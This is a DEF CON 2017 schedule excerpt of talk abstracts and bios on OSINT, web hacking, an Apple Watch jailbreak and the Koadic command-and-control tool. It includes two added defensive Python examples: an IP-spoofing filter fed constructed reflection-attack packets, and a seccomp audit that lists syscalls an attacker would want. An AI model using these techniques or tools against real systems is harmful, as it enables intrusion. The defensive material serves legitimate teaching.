In terms of tools used in this presentation, the list is somewhat fluid based upon the advancement of other tools, social media platforms, or other variables. Tools intended to be highlighted are: OSINTFramework.com, Inteltechniques.com, Buscador Linux, Recon-ng, Datasploit, APIs (Twitter and possibly Facebook; maybe others), haveibeenpwned, Cree.py, whois, persona generator, and others.

Depending on your position, this talk will either arm you with the right tools to build better OSINT engagements, whether for phishing or other investigations, or educate you on steps you can take to better secure yourself.

Detailed talk outline: Hour 1

Speaker Profile

Joe Gray (@C_3PJoe) joined the U.S. Navy directly out of High School and served for 7 years as a Submarine Navigation Electronics Technician. Joe is an Enterprise Security Consultant at Sword & Shield Enterprise Security in Knoxville, TN. Joe also maintains his own Blog and Podcast called Advanced Persistent Security. In his spare time, Joe enjoys reading news relevant to information security, attending information security conferences, contributing blogs to various outlets, bass fishing, and flying his drone. He is currently progressing his DFIR skills through Data Carving and Malware Analysis and Reverse Engineering.

I have spoken/presented at the following (all 2017): BSides Huntsville (last-minute alternate), (ISC)² Atlanta, BSides Indy, (ISC)² Middle TN, Infosec Southwest, BSides Nashville, BSides Charm (Baltimore), BSides Knoxville, BSides Cincy, DC865 (Knoxville TN DEF CON chapter).

Here are some links to my talks:



DEFCON - Track 3 - Saturday - 17:00-17:45


Introducing HUNT: Data Driven Web Hacking & Manual Testing

Saturday at 17:00 in Track 3

45 minutes | Demo, Tool

Jason Haddix Head of Trust and Security @ Bugcrowd

What if you could super-charge your web hacking? Not through pure automation (since it can miss so much) but through powerful alerts created from real threat intelligence? What if you had a Burp plugin that did this for you? What if that plugin not only told you where to look for vulns but also gave you curated resources for additional exploitation and methodology? What if you could organize your web hacking methodology inside of your tools? Well, now you do! HUNT is a new Burp Suite extension that aims to arm web hackers with parameter-level suggestions on where to look for certain classes of vulnerabilities (SQLi, CMDi, LFI/RFI, and more!). This data is parsed from hundreds of real-world assessments, providing the user with the means to effectively root out critical issues. Not only will HUNT help you assess large targets more thoroughly, but it also aims to organize common web hacking methodologies right inside of Burp Suite. As an open source project, we will go over the data-driven design of HUNT and its core functionality.

Jason Haddix
Jason is the Head of Trust and Security at Bugcrowd. Jason trains and works with internal security engineers to triage and validate hardcore vulnerabilities in mobile, web, and IoT applications/devices. He also works with Bugcrowd to improve the security industry's relations with researchers. Jason's interests and areas of expertise include mobile penetration testing, black box web application auditing, network/infrastructure security assessments, and static analysis. Jason lives in Santa Barbara with his wife and three children. Before joining Bugcrowd, Jason was the Director of Penetration Testing for HP Fortify and also held the #1 rank on the Bugcrowd leaderboard for 2014.

@jhaddix

Contributor Acknowledgement:
The Speaker would like to acknowledge the following for their contribution to the presentation.

JP Villanueva is a Trust & Security Engineer at Bugcrowd. Before Bugcrowd, JP spent 2 years as an Application Security Engineer and another 2 years as a Solutions Architect at WhiteHat Security helping customers become more secure. JP has also presented at OWASP and Interop DarkReading events. In his free time, JP enjoys playing classic video games and hacking on bug bounty programs.

Fatih is an Application Security Engineer at Bugcrowd and Bug Hunter located in Istanbul/Turkey. Before Bugcrowd, he was a security consultant at InnoveraBT and performed penetration testing for clients including government, banks, trade, and finance companies. His expertise includes network, web applications, mobile security assessments, and auditing. He also holds OSCP, OSCE, GWAPT certifications.

Ryan Black is the Director of Technical Operations at Bugcrowd where he heads strategy and operations for the Application Security Engineering team. This group reviews and validates tens of thousands of vulnerability reports to bug bounty programs.

Prior to joining Bugcrowd, Ryan developed and led the static analysis and code review team for HP Fortify on Demand, later expanding to DevOps tooling and integrations for the enterprise. He has also held various InfoSec and technology positions at companies such as Aflac and Apple in the last decade. In addition to professional experience, he holds several industry certifications and participates in a variety of open source software projects and initiatives. On personal time he enjoys coding, gaming, various crafts, and nature activities with his wife, two kids, and three dogs.

Vishal Shah is an Application Security Engineer specializing in web and mobile security at Bugcrowd. Prior to Bugcrowd, Vishal spent time as a Security Consultant with Cigital hacking and building automation for hackers. In his free time, Vishal enjoys working out, CTFs, and playing video games.



PHW - Neopolitan BR IV - Promenade Level - Friday - 19:00-20:30


Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols


Dane Goodwin

When it comes to HTTP interception, the tools of the trade are excellent. However, setting up an intercepting proxy for protocols other than HTTP can be time consuming and difficult. To address this gap, we've created a new proxy, which allows you to define a new protocol on the fly using Netty's built-in protocol encoders and decoders, as well as being able to create your own using the existing Netty libraries. Once defined, you can interact with the objects in real time, modifying objects and properties as you see fit. This workshop will give you hands-on experience with our new proxy.

Dane Goodwin (Twitter: @dane_goodwin) has worked as a pentester for ~4 years, after deciding a career in development wasn't for him. He's presented some coolness at ZaCon, BSides Cape Town, and Black Hat Arsenal 2016. While not cycling, he currently spends his time learning all things SDR.




VMHV - Roman 1, Promenade Level - Friday - 11:00-11:45


Title: Introduction into hacking the equipment in the village


Sandy Clark Bio
Sandy Clark
Ph.D. Student, Computer Science, University of Pennsylvania

Sandy Clark is a graduate student (Ph.D.) in computer and information science at the University of Pennsylvania. Her research focuses on computer security and privacy, with an emphasis on computer security as an ecosystem. Much of her work explores solutions to computer security problems from non-traditional disciplines. She also focuses on software security, user and data privacy, anonymity, computer-human interaction, ethics, cybercrime, malware evolution and the security arms race. Most recently, her work has also focused on the interaction of technology with law, governmental regulation, and international affairs.

Harri Hursti Bio
Harri Hursti, Subject Matter Expert & Co-founder of ROMmon

Mr. Harri Hursti, Founding Partner, Nordic Innovation Labs, is a world-renowned data security expert, internet visionary and serial entrepreneur. He began his career as the prodigy behind the first commercial, public email and online forum system in Scandinavia. He founded his first company at the age of 13 and went on to cofound EUnet-Finland in his mid-20s. Today, Harri continues to innovate and find solutions to the world's most vexing problems. He is among the world's leading authorities in the areas of election voting security and critical infrastructure and network system security.

Matt Blaze Bio
Matt Blaze, Cryptographer & Associate Professor of Computer & Information Science at University of Pennsylvania

Matt Blaze is a professor at the University of Pennsylvania, where he directs the Distributed Systems Lab and conducts research in security, privacy, surveillance, cryptography, scale, and the relationship between technology and public policy. His work has included the discovery of fundamental flaws in the Clipper chip and other surveillance systems, foundational work in network security, file encryption, trust management and two-way radio security, and security evaluations of major electronic voting systems in use in the US.


PHW - Neopolitan BR IV - Promenade Level - Sunday - 13:00-14:30


Introduction to 802.11 Packet Dissection

Megumi Takeshita, aka Packet Otaku, Ikeriri Network Service Co., Ltd.

Have you ever wanted to capture, filter, examine, visualize, decrypt and follow sequences of 802.11 packets? This workshop demonstrates a typical, basic workflow of wireless packet analysis. It will cover basic wireless packet analysis using Wireshark: examining the internals of 802.11 frames including the Radiotap header, looking at the importance and meaning of the fields, marking packets and understanding link-layer processes, entering the WPA2 decryption key to explore WPA2-PSK frames, and creating graphs to visualize the statistics of a wireless network.

Megumi Takeshita, or Packet Otaku (Twitter: @ikeriri), runs a packet analysis company, Ikeriri Network Service, after having worked at Bay Networks and Nortel Networks in Japan. Ikeriri Network Service is a reseller of many wired/wireless capture and analysis devices and software for Riverbed, MetaGeek, Profitap, Dualcomm, etc. Megumi has authored 18+ books about Wireshark and packet analysis in Japanese. She is a contributor to the Wireshark project and has presented multiple times at SharkFest, Interop Tokyo and other conferences.



PHW - Neopolitan BR IV - Promenade Level - Saturday - 14:30-15:59


Introduction to 802.11 Packet Dissection

Megumi Takeshita, aka Packet Otaku, Ikeriri Network Service Co., Ltd.

Have you ever wanted to capture, filter, examine, visualize, decrypt and follow sequences of 802.11 packets? This workshop demonstrates a typical, basic workflow of wireless packet analysis. It will cover basic wireless packet analysis using Wireshark: examining the internals of 802.11 frames including the Radiotap header, looking at the importance and meaning of the fields, marking packets and understanding link-layer processes, entering the WPA2 decryption key to explore WPA2-PSK frames, and creating graphs to visualize the statistics of a wireless network.

Megumi Takeshita, or Packet Otaku (Twitter: @ikeriri), runs a packet analysis company, Ikeriri Network Service, after having worked at Bay Networks and Nortel Networks in Japan. Ikeriri Network Service is a reseller of many wired/wireless capture and analysis devices and software for Riverbed, MetaGeek, Profitap, Dualcomm, etc. Megumi has authored 18+ books about Wireshark and packet analysis in Japanese. She is a contributor to the Wireshark project and has presented multiple times at SharkFest, Interop Tokyo and other conferences.



Workshops - ( Sold Out ) - Octavius 6 - Thursday - 10:30-14:30


Introduction to Cryptographic Attacks

Thursday, 10:30 to 14:30 in Octavius 6

Matt Cheung

Cryptography can seem like a mysterious black box making attacks even more mysterious. Introduction to Cryptographic Attacks is for those who have no experience with cryptographic attacks and how they work. In this workshop you will learn how simple some of these attacks are, and you will build a foundation in cryptographic primitives and potential weak points of real world systems.

The workshop will lead attendees through CTF style crypto challenges that illustrate critical cryptographic weaknesses. I recommend coming prepared with a Python environment and the following modules: cryptography or PyCrypto, gmpy2 (requires installing gmp), and requests.

Prerequisites: None, though some moderate math and programming experience is useful.

Materials: A laptop with Python installed, as I will have some code snippets to help with the exercises.

Max students: 30 | Registration: https://dc25_cheung.eventbrite.com (Sold out!)

Matt Cheung
Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given talks and workshops at the Boston Application Security Conference and the DEF CON Crypto and Privacy Village.



Workshops - ( Sold Out ) - Octavius 6 - Thursday - 14:30-18:30


Introduction to Practical Network Signature Development for Open Source IDS

Thursday, 14:30 to 18:30 in Octavius 6

Jack Mott Researcher, Proofpoint

Jason Williams Researcher, Proofpoint

In "Introduction to Practical Network Signature Development for Open Source IDS" we will teach expert methods and techniques for writing network signatures to efficiently detect the greatest threats facing organizations today. This class is designed for an analyst who spends their days investigating and responding to network IDS alerts, and has something everyone can take back with them, entry level or expert. Students will gain invaluable information and knowledge including usage, theory, malware traffic analysis fundamentals, and enhanced signature writing for open source IDS such as Suricata and Snort. Students will be given handouts to help them develop and read IDS signatures. Lab exercises will train students how to analyze and interpret hostile network traffic into agile IDS rules for detecting threats, including but not limited to: exploit kits, ransomware, phishing attacks, crimeware backdoors, targeted threats, and more. Students will leave the class armed with the knowledge of how to write quality IDS signatures for their environment, enhancing their organization's ability to detect and respond to threats.

Prerequisites: Familiarity with TCP/IP, familiarity with packet analysis tools (Wireshark, etc.), and basic malware analysis fundamentals.

Materials: Nothing required, but if the student wishes, they may bring a computer capable of analyzing PCAPs and running Snort or Suricata to follow along with the presentation. Labs are provided for after class / take home practice.

Max students: 30 | Registration: https://dc25_mott.eventbrite.com (Sold out!)

Jack Mott
Jack is a Security Researcher on the Emerging Threats Research team at Proofpoint, where he spends all day long in packet-land playing with malware and writing comprehensive IDS rules for the ETPRO and OPEN rulesets. In addition to IDS signatures, he writes signatures for ClamAV and YARA to hunt, detect, and analyze internet-borne threats. Jack loves analyzing exploit kits, malicious docs, and ransomware. Jack is a core member and trainer with the non-profit Open Information Security Foundation (OISF) and works closely with the developers of Suricata. Additionally, Jack has spoken at various educational institutions and information security conferences on malware-related topics.

Jason Williams
Jason is a Security Researcher on the Emerging Threats Research team at Proofpoint, where he flops around in a metaphorical ball pit of network packets all day and night. He works on the ETPRO and OPEN rulesets, having written over four thousand signatures. He loves turning malware inside out and fights phishers and scammers 24/7. Seriously. He hates 'em. I once saw him 360 noscope 3 at once. I'm getting off topic. Outside of his work automating phishing research, he also works on Red Onion, a CentOS/Red Hat-centric NSM solution combining Suricata, Bro, and Moloch. Jason is a core member and trainer with the non-profit Open Information Security Foundation (OISF) and works closely with the developers of Suricata. Jason has trained at DerbyCon and spoken at THOTCON as well as various educational institutes on forensic and malware-related topics.



ICS - ICS-Village - Friday - 11:30-11:59


Title: Introduction to the ICS Wall - Tom Van Norman

No description available

Bio: Tom Van Norman

No BIO available



Workshops - ( Sold Out ) - Octavius 5 - Friday - 10:30-14:30


Introduction to x86 disassembly

Friday, 10:30 to 14:30 in Octavius 5

DazzleCatDuo

Jumping into the world of disassembly can be incredibly intimidating and quite painful. This talk aims to introduce disassembly by walking through how to recognize basic logic flows and data structures in assembly. We'll look at locating common flow controllers such as if/else/loops/switch cases, as well as data structures. The talk will specifically address static disassembly using IDA, looking at C compiled to x86_32, but the principles can be applied to any other language and assembly architecture. x86 is one of the most common assembly architectures, and is incredibly useful for security engineers to understand; it is the assembly architecture running almost all Mac, Windows, and Linux computers.

Prerequisites: Students must have basic coding knowledge and understand what if/else/loops/switches logically do, in any coding language.

Materials: Please bring a laptop with VirtualBox (latest version) and at least 20 GB of free disk space. VMs with examples and tools will be distributed in class via USB sticks.

Max students: 90 | Registration: https://dc25_dazzlecatduo.eventbrite.com (Sold out!)

DazzleCatDuo
The DazzleCatDuo are both security engineers who specialize in x86 research.



IOT - Main Contest Area - Friday - 16:10-16:59




BHV - Pisa Room - Saturday - 13:30-13:59


Title: IoT of Dongs

Speaker: RenderMan


About RenderMan:
Canadian born and raised. He hacks banks during the day and other random things at night (currently sex toys). His interests are very diverse and people seem to like to hear about his work as much as he enjoys sharing it. This has allowed him to speak at conferences and events all over the world and even change it a few times.
Often near infosec news or causing it himself, he can be found on twitter at @ihackedwhat and @internetofdongs

Abstract:
Among ‘Internet of Things’ security research, there is one branch that no one has wanted to touch, until now: The Internet of Dongs. Internet connected sex toys in all shapes, sizes and capabilities are available on the market with many more being developed. Like many IoT devices, IoD devices suffer a great many security and privacy vulnerabilities. These issues are all the more important when you consider the private and intimate nature of these devices. To research this, the Internet of Dongs project was founded (https://internetofdon.gs).
This talk will explore this under-researched branch of IoT and the security and privacy threats that exist. It will also cover the IoD project's efforts to bring information security best practices to the adult toy industry.




IOT - Main Contest Area - Saturday - 23:30-24:20




IOT - Main Contest Area - Friday - 23:30-24:20




PHV - Milano VIII - Promenade Level - Friday - 15:10-15:59


IP Spoofing

Marek Majkowski, Cloudflare

At Cloudflare we deal with DDoS attacks every day. Over the years, we've gained a lot of experience in defending from all different kinds of threats. We have found that the largest attacks that cause the internet infrastructure to burn are only possible due to IP spoofing.

In this talk we'll discuss what we learned about L3 (OSI Layer 3) IP spoofing. We'll explain why L3 attacks are even possible in today's internet and what direct and reflected L3 attacks look like. We'll describe our attempts to trace IP spoofing and why attack attribution is so hard. Our architecture allows us to perform most attack mitigations in software. We'll explain a couple of effective L3 mitigation techniques we've developed to stop our servers burning.

While L3 attacks are a real danger to the internet, they don't need to be. With a bit of cooperation and couple of technical tricks maybe we can fix the IP spoofing problem for all.

Marek Majkowski (Twitter: @majek04). After fruitful encounters with such diverse topics as high performance key value databases, distributed queueing systems, making real time web communication enjoyable, and accelerating the time so that testing servers and protocols takes seconds, Marek Majkowski finally settled for working on DDoS mitigation in the CloudFlare London office, where he appreciates most the parking space for his motorbike.
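The reason spoofed-source floods and reflection attacks are possible at all is that many edge networks forward packets without checking that the source address could have come from the interface it arrived on. The model below is an added example, not Cloudflare's code: it implements the ingress check (BCP 38 / unicast reverse-path forwarding) an edge router would apply, in its strict and loose forms, against a constructed topology and three constructed packets, one of which is the first hop of a DNS reflection attack. Interface names, prefixes and addresses are assumptions (RFC 5737 documentation ranges).

```python
import ipaddress

# Constructed topology (assumed, not from any real network): prefixes that are
# legitimately routed behind each customer-facing interface of an edge router.
CUSTOMER_PREFIXES = {
    "cust-eth1": ["198.51.100.0/24"],
    "cust-eth2": ["203.0.113.0/25", "203.0.113.128/26"],
}


def build_table(prefix_map):
    """Parse the interface -> prefixes map into ip_network objects."""
    return {iface: [ipaddress.ip_network(p) for p in prefixes]
            for iface, prefixes in prefix_map.items()}


def source_is_valid(table, iface, src, mode="strict"):
    """Decide whether a packet's source address is plausible for its ingress interface.

    strict: the source must be inside a prefix routed via that interface
            (BCP 38 at the customer edge; stops bogons and cross-customer spoofing).
    loose:  the source only has to exist somewhere in the table (stops bogons and
            unallocated space, but lets one customer impersonate another).
    """
    addr = ipaddress.ip_address(src)
    if mode == "strict":
        nets = table.get(iface, [])
    elif mode == "loose":
        nets = [n for group in table.values() for n in group]
    else:
        raise ValueError(f"unknown mode {mode!r}")
    return any(addr in n for n in nets)


# Constructed packets as the edge router would see them.  The second one is
# the first hop of a reflection attack: a host behind cust-eth1 spoofs the
# victim's address (192.0.2.10) as source and sends a small DNS query to an
# open resolver (192.0.2.53); the resolver's larger answer goes to the victim.
# The third is a cross-customer spoof: a real address, but on the wrong interface.
PACKETS = [
    {"iface": "cust-eth1", "src": "198.51.100.7", "dst": "192.0.2.53", "dport": 53},
    {"iface": "cust-eth1", "src": "192.0.2.10", "dst": "192.0.2.53", "dport": 53},
    {"iface": "cust-eth1", "src": "203.0.113.9", "dst": "192.0.2.53", "dport": 53},
]


def filter_packets(table, packets, mode="strict"):
    """Split packets into (forwarded, dropped) under the chosen uRPF mode."""
    forwarded, dropped = [], []
    for pkt in packets:
        ok = source_is_valid(table, pkt["iface"], pkt["src"], mode)
        (forwarded if ok else dropped).append(pkt)
    return forwarded, dropped


if __name__ == "__main__":
    table = build_table(CUSTOMER_PREFIXES)
    for mode in ("strict", "loose"):
        fwd, drop = filter_packets(table, PACKETS, mode)
        print(f"{mode}: forwarded {[p['src'] for p in fwd]}, "
              f"dropped {[p['src'] for p in drop]}")
```

Run it to see strict mode drop both the reflection packet and the cross-customer spoof, while loose mode only stops the address that is not routed anywhere. That gap is why BCP 38 asks for the filter at the customer edge, where the set of legitimate sources is smallest and the check is cheapest.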



PHV - Milano VIII - Promenade Level - Friday - 12:10-12:59


Iron Sights for Your Data

Leah Figueroa

Data breaches have become all too common. Major security incidents typically occur at least once a month. With the rise of both security incidents and full data breaches, blue teams are often left scrambling to put out fires and defend themselves without enough information. This is something that can be changed with the right tools. Tools now available allow blue teams to weaponize data and use it to their advantage. This talk reviews frameworks for clean, consistent data collection and provides an overview of how predictive analytics works, from data collection to data mining to predictive analytics to forecasts. This allows the blue team to focus on potential risks instead of trying to put out every fire.

Leah Figueroa (Twitter: @Sweet_Grrl) is a 13-year veteran of the data analytics field and works as a data analyst in higher education. She holds a Master's in Education, an ABD in research psychology, and taught kindergarten. A data aficionado, Leah focuses on research on improving students' outcomes at the higher education level, including both minority students' issues and issues pertaining to students who come from a background of poverty. While not at work, Leah is interested in improving blue teams by helping bring data analytics into the team. Leah also enjoys being a fiber artist (knitter), loves cats, InfoSec, picking locks, cooking, and reading.



SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 11:00-11:59


Title:
It's Not Just the Elections!

1100 Sunday
Malware Utkonos
@MalwareUtkonos

Sofacy, APT28, Fancy Bear, or whatever one wishes to refer to them by, have been working overtime on meddling with elections. The first major news-cycle election that came under attack was the 2016 US Presidential election. Months later, the same group set their sights on the 2017 French elections. It seems that election hacking has become a central danger to modern society. Unfortunately, it is not the only danger. Attacks by the same type of adversary that target individuals such as journalists and activists are just as dangerous, and in many ways more insidious. The greatest difficulty for targets like these is they don't have SOCs, IR teams, threat intelligence teams, security engineers, or a CISO. Some of them may be fortunate enough to have non-profits looking after them if they get spear-phished. Others may even be working with private industry and vendors for assistance. Throughout this process, it can be difficult to interact with and effectively collect all the data needed to triage a phish and get information back to the individual about what it is and potentially who may be behind it.

The tool that we have developed has quite a boring name: Help Site. We didn't want to name it something scary or cloak-and-dagger: what we're working on has more than enough of that to go around. The long and short of it is we have developed a canned web server using Vagrant and open source software that allows journalists, activists, dissidents, and others who are under attack to safely report phishing and malware attacks to organizations that can help them. In addition to the ability to submit components of an attack for analysis, there is a growing library of instructions for how to extract an email with full headers from a multitude of common email clients. In this talk, viewers will leave with an understanding of why such a system is needed to distance the attack surface and contain it, as well as some of the work that we did leading up to this project.


RCV - Palermo room, Promenade level - Friday - 14:20-14:55


Keynote: It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining

The OSINT and reconnaissance landscape is beginning to face some challenges. Currently valuable sources such as open-sourced lists are already facing offensive and malicious data poisoning. Privacy laws are creating barriers in many areas, and court rulings are levying increasing fines for playing fast and loose with user data privacy. Social media companies are starting to realize that they actually need to start making profits, and are restricting their data.

Sites are aggressively combating web crawling, and services like Tor and VPNs face uncertain futures; the list of potential hurdles to the future of OSINT and recon seems grim. But fear not. There is still hope, and plenty of it. This presentation will discuss the challenges and changes to both offensive and defensive reconnaissance that the presenter believes we will see in the future, and strategies that will help mitigate or enhance these changes.

Speaker Profile

Shane MacDougall (tactical_intel) is a two-time winner of the DEF CON Social Engineering Capture The Flag, and has placed in the top three of the attack portion in every year of the contest's existence. He is a principal partner in Tactical Intelligence, a boutique InfoSec consulting firm in Canada that specializes in social engineering, corporate information gathering, and red team attacks. Mr. MacDougall started in the computer security field in 1989 as a penetration tester with KPMG, and worked on the attacking side of the field until 2002, when he joined ID Analytics, the world's largest anti-identity-theft detection company, as head of information security. In 2011 he left the firm to start his own company. Mr. MacDougall has presented at several security conferences, including Black Hat EU, BSides Las Vegas, DerbyCon, LASCON, and ToorCon. He is currently doing research in the areas of integrating near-real-time OSINT into IDS/SIEM, as well as the generation of a real-time pretext generator.



DEFCON - Track 2 - Thursday - 12:00-12:45


Jailbreaking Apple Watch

Thursday at 12:00 in 101 Track 2

45 minutes | Demo

Max Bazaliy Security Researcher, Lookout

On April 24, 2015, Apple launched themselves into the wearables category with the introduction of Apple Watch. This June, at Apple's Worldwide Developer Conference, Apple announced that their watch is not only the #1 selling smartwatch worldwide by far, but also announced the introduction of new capabilities that will come with the release of watchOS 4. Like other devices, Apple Watch contains highly sensitive user data such as email and text messages, contacts, GPS and more, and like other devices and operating systems, has become a target for malicious activity.

This talk will provide an overview of Apple Watch and watchOS security mechanisms including codesign enforcement, sandboxing, memory protections and more. We will cover vulnerabilities and exploitation details and dive into the techniques used in creating an Apple Watch jailbreak. This will ultimately lead to a demonstration and explanation of jailbreaking an Apple Watch, showcasing how it can access important user data and applications.

Max Bazaliy
Max is a Security Researcher at Lookout with more than ten years of experience in areas such as reverse engineering, software security, vulnerability research and advanced exploitation. He currently focuses on iOS exploitation, reverse engineering advanced mobile malware and hardware attacks. Max was a lead security researcher on the Pegasus iOS malware investigation.

In the past few years, Max has spoken at various security conferences, including Black Hat, CCC, DEF CON, Ruxcon, RSA and BSides.

Max holds a Master's degree in Computer Science and is currently a PhD student at the National Technical University of Ukraine "Kyiv Polytechnic Institute", where he is working on a dissertation in the area of code obfuscation and privacy.

@mbazaliy



PHW - Neopolitan BR IV - Promenade Level - Friday - 17:00-18:30


Linux Lockdown: Jailing Programs with Linux Containers

Jay Beale, CTO and COO at InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use Linux containers to better contain an attack on any program running on the system. You will be given a vulnerable program to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then contain it and exploit it again. We'll discuss AppArmor, seccomp and SELinux, and you'll be able to download the virtual machines to try more advanced versions of this afterward. For purposes of ease, we'll use Docker, but you can take the concepts home and try them with LXC/LXD, runc, or another framework for managing containers. This workshop is being taught for the first time and provides one topic from the long-running Black Hat class, "Aikido on the Command Line."

Jay Beale (Twitter: @jaybeale and @inguardians) has been working in Linux security since 1999, when he began creating several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. His first talk at Def Con was in 2000. Jay is a founder and both the CTO and Chief Operating Officer of the information security consulting company InGuardians.



PHW - Neopolitan BR IV - Promenade Level - Saturday - 12:30-13:59


Linux Lockdown: Jailing Programs with Linux Containers

Jay Beale, CTO and COO at InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use Linux containers to better contain an attack on any program running on the system. You will be given a vulnerable program to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then contain it and exploit it again. We'll discuss AppArmor, seccomp and SELinux, and you'll be able to download the virtual machines to try more advanced versions of this afterward. For purposes of ease, we'll use Docker, but you can take the concepts home and try them with LXC/LXD, runc, or another framework for managing containers. This workshop is being taught for the first time and provides one topic from the long-running Black Hat class, "Aikido on the Command Line."

Jay Beale (Twitter: @jaybeale and @inguardians) has been working in Linux security since 1999, when he began creating several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. His first talk at Def Con was in 2000. Jay is a founder and both the CTO and Chief Operating Officer of the information security consulting company InGuardians.
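One way to put the seccomp step of the workshop into practice, covering both Linux Lockdown sessions above, as an added example that is not part of the workshop materials or of the Docker project: build a Docker seccomp allow-list from the syscalls a program was observed to make, then check the profile against syscalls an attacker would want after compromising the contained process. The observed-syscall and risky-syscall lists below are constructed for illustration; the JSON shape is the one Docker accepts via --security-opt seccomp=<file>.

```python
import json

# Constructed for illustration: syscalls a small network service was seen
# making while exercised under `strace -f -c`.  Not complete for any real
# program; collect your own list.
OBSERVED_SYSCALLS = [
    "read", "write", "openat", "close", "fstat", "mmap", "munmap", "brk",
    "rt_sigaction", "rt_sigprocmask", "socket", "bind", "listen", "accept4",
    "sendto", "recvfrom", "poll", "exit_group", "futex", "clock_gettime",
    "getpid", "setsockopt", "epoll_create1", "epoll_ctl", "epoll_wait",
]

# Assumed list of syscalls this service has no business making but that are
# useful to an attacker who has taken over the process.  Adjust per workload.
RISKY_SYSCALLS = [
    "ptrace", "mount", "umount2", "pivot_root", "chroot", "keyctl",
    "init_module", "finit_module", "delete_module", "kexec_load", "bpf",
    "unshare", "setns", "reboot", "personality", "process_vm_readv",
    "process_vm_writev",
]


def build_profile(allowed, arches=("SCMP_ARCH_X86_64",)):
    """Allow-list profile in the JSON shape Docker's --security-opt seccomp=
    accepts: every syscall not listed fails with an errno instead of running."""
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "architectures": list(arches),
        "syscalls": [
            {"names": sorted(set(allowed)), "action": "SCMP_ACT_ALLOW"},
        ],
    }


def allowed_syscalls(profile):
    """Collect the names every ALLOW rule grants, accepting both the 'names'
    list and the older single-'name' form.  Argument filters on a rule are
    ignored, so a conditionally allowed syscall counts as allowed."""
    names = set()
    for rule in profile.get("syscalls", []):
        if rule.get("action") != "SCMP_ACT_ALLOW":
            continue
        names.update(rule.get("names", []))
        if "name" in rule:
            names.add(rule["name"])
    return names


def is_allowed(profile, syscall):
    """True if the profile lets the syscall through, either by an explicit
    rule or because its defaultAction is permissive."""
    if syscall in allowed_syscalls(profile):
        return True
    return profile.get("defaultAction") == "SCMP_ACT_ALLOW"


def audit(profile, risky=RISKY_SYSCALLS):
    """Risky syscalls the profile would still permit; an empty list means the
    jail closes every door on the list."""
    return sorted(s for s in risky if is_allowed(profile, s))


def main():
    profile = build_profile(OBSERVED_SYSCALLS)
    with open("service-seccomp.json", "w") as fh:
        json.dump(profile, fh, indent=2)
    print("still permitted:", audit(profile) or "none")
    print("run with: docker run --security-opt seccomp=service-seccomp.json "
          "--security-opt no-new-privileges --cap-drop ALL <image>")


if __name__ == "__main__":
    main()
```

Collect the real list by exercising every code path of the program, for every architecture the image runs on; with defaultAction SCMP_ACT_ERRNO, any syscall you missed fails at runtime rather than silently working, which is the right failure direction for a jail but will show up as odd errors until the list is complete.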



DEFCON - Track 2 - Saturday - 13:00-13:45


Koadic C3 - Windows COM Command & Control Framework

Saturday at 13:00 in Track 2

45 minutes | Demo, Tool

Sean Dillon (zerosum0x0) Senior Security Analyst, RiskSense, Inc.

Zach Harding (Aleph-Naught-) Senior Security Analyst, RiskSense, Inc.

Koadic C3, or COM Command & Control, is a Windows post-exploitation tool similar to other penetration testing rootkits such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using the Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

An in-depth view of default COM objects will be provided. COM is a fairly underexplored, large attack surface in Windows. We will share lots of weird Windows scripting quirks with interesting workarounds we discovered during the course of development. Post exploitation with PowerShell has grown in popularity in recent years, and seeing what can be done with just the basic Windows Script Host is an interesting exploration. In addition, defenses against this type of tool will be discussed, as the Windows Script Host is more tightly coupled to the core of Windows than PowerShell is.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has available). We also found numerous ways to "fork to shellcode" in an environment which traditionally does not provide such capabilities. This talk is based on original research by ourselves, as well as the previous amazing work of enigma0x3, subTee, tiraniddo, and others.

Sean Dillon (zerosum0x0)
Sean Dillon is a senior security analyst at RiskSense, Inc. He has an established research focus on attacking the Windows kernel, and was the first to reverse engineer the DOUBLEPULSAR SMB backdoor. He is a co-author of the ETERNALBLUE Metasploit module and has made other contributions to the project. He has previously been a software engineer in the avionics and insurance industries, and his favorite IDE is still GW-BASIC on DOS.

https://twitter.com/zerosum0x0
https://zerosum0x0.blogspot.com
https://github.com/zerosum0x0

Zach Harding (Aleph-Naught-)
Zach Harding is a senior security analyst at RiskSense, Inc. Zach formerly served in the US Army as a combat medic. He, along with Sean Dillon and others, improved leaked NSA code to release the "ExtraBacon 2.0" Cisco ASA exploit package. He is an avid tester of every penetration tool he can get a hold of. You know the guy who's always looking for available public WiFi, or fiddling with a kiosk machine? That's Zach.

https://github.com/Aleph-Naught-



Demolabs - Table 1 - Saturday - 12:00-13:50


LAMMA 1.0

Antriksh Shah

Ajit Hatti

Saturday from 1200-1350 at Table One

Audience: Cryptologists, cryptanalysts, developers and testers, blockchain and PKI implementers.

